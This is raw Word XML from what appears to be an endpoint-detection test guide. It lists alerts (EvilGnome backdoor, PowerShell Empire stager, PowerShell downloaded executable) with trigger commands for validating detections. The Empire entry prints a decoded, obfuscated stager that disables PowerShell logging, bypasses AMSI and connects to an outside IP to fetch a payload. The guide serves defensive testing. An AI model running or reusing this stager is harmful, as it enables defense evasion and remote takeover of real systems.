        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FEE0572" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux.EvilGnome.ioc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4953D947" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C36417" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Description: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EvilGnome is a Linux backdoor targeting Gnome desktop user. However, it can be installed on Linux servers as it does not require the Gnome desktop environment to be installed. This implant is believed to be used by the Gamaredon Group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E3A464" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation Type: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cloud IOC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02266899" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">History: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16876803" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t xml:space="preserve">Telemetry: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t>CSE Alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ADF7EF" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Tactic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240D6930" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3189165A" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">Special Considerations: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Linux Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732B5235" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">Preparation Command: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>no preparation required to run this trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFDC173" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger Command: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nohup /home/cloud/.cache/gnome-software/gnome-shell-extensions/gnome-shell-ext.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F33EE8" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C113DD" w14:textId="4A2F3EA2" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A3A609F" wp14:editId="3C3C1E23">
            <wp:extent cx="5731510" cy="1439545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="63493268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439545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6423C6FF" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B9609F0" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56082C34" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Powershell Empire Stager Payload - Threat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1294B5F0" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E147301" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Powershell Empire is a Remote Access framework marketed as a Red Team post exploitation tool. In this case, a PowerShell Empire Stager payload was detected which will attempt to connect as an agent to the Powershell Empire listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218CDDC2" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observation Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Threat Detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342420A3" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>History:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6904D9CA" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSE Alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A240CA5" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Tactic: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54061638" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088F3AFD" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Considerations:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This command generated a BPE event and additional Cloud IOCs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D6AAD0" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> no preparation required to run this trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B63E287" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc 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</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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 (Decoded [truncated]: IF($PSVERsIOnTABLE.PSVErsiOn.MaJoR -ge 3){$GPS=[REF].ASSeMbly.GEtTypE('System.Management.Automation.Utils')."GEtFie`lD"('cachedGroupPolicySettings','N'+'onPublic,Static').GETValUe($NulL);If($GPS['ScriptB'+'lockLogging']){$GPS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}Else{[SCriPTBLoCk]."GETFiE`ld"('signatures','N'</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>+'onPublic,Static').SETVaLuE($Null,(NEw-ObJect COllecTIoNs.GEnERiC.HasHSEt[striNg]))}[REF].AssEMBlY.GetTYpe('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GETFieLd('amsiInitFailed','NonPublic,Static').SeTValuE($NulL,$TRue)};};[SysTEm.NET.SERviCEPoiNTManAgeR]::ExPect100ContiNUE=0;$WC=NEW-ObJeCt SYStEM.NeT.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$Wc.HeadERs.ADd('User-Agent',$u);$Wc.PRoXy=[SySTEM.NET.WEbReQUest]::DefAULtWebPRoxy;$wc.PrOXy.CREdeNTiAlS = [SystEm.Net.CreDENTIaLCaChE]::DefaUlTNeTwORkCrEdENtIaLs;$Script:Proxy = $wc.Proxy;$K=[SysTEM.TeXT.EncodInG]::ASCII.GEtBytEs('ebafb2373fa9a6a1b0d04478f132fb97');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COUnT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXoR$S[($S[$I]+$S[$H])%256]}};$ser='</w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="000D61E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-CA"/>
          </w:rPr>
          <w:t>https://185.86.148.111:443</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>';$t='/admin/get.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F61D5A" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59D0C409" w14:textId="3CC13212" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C9995B1" wp14:editId="62218D71">
            <wp:extent cx="5731510" cy="2748280"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="91932611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48280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FD6BE8" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D217D91" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38DB1F29" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="20"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D61E6" w:rsidRPr="000D61E6" w14:paraId="49EBC66C" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4947288F" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D61E6" w:rsidRPr="000D61E6" w14:paraId="6C2A0F7C" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7527FA38" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19B72025" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2158F134" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24A0FFB6" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>PowerShell Downloaded</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7E9FBD" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Severity: High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C2FF75" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECF17A1" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observation Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cloud IOC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CA3317" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>History:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D16A44A" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSE Alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A987CB" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Tactic: Defense Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACB5993" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Scripting Interpreter: Powershell</w:t>
      </w:r>
    </w:p>
